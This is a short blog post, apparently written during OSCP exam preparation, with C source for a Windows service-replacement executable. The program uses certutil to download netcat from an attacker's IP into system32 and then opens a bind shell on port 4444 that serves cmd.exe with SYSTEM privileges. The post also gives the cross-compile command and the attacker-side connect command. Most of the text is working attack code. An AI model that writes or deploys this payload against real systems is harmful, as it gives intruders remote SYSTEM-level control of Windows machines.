Creating a Windows Bind Shell Using C

Creating a Windows Bind Shell Using C

I’m studying for the OSCP and needed to replace the exe file of a Windows service with a new .exe file. On reboot my goal is to have a shell as NT Authority/System

Source Code

Filename: winshell.c

This file will:

  1. Using the native “certuil.exe”, download nc.exe.txt from the kali
    box and save it as C:\windows\system32\nc.exe
  2. Create a listening socket on TCP 4444 (Windows Machine)
    3. 
#include <stdlib.h
#include <windows.h

int main ()
{

    int i;

    i = system ("certutil -urlcache -split -f http://192.168.119.152/nc.exe.txt c:\\windows\\system32\\nc.exe");
    Sleep(10000); // 10 seconds (10000 milliseconds)
    i = system ("nc.exe -nlvp 4444 -e cmd.exe");

            return 0;

    }

Compile winshell.c

sudo i686-w64-mingw32-gcc winshell.c -o winshell.exe

Connect Windows shell from attacker box

nc -nv 192.168.152.10 4444

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.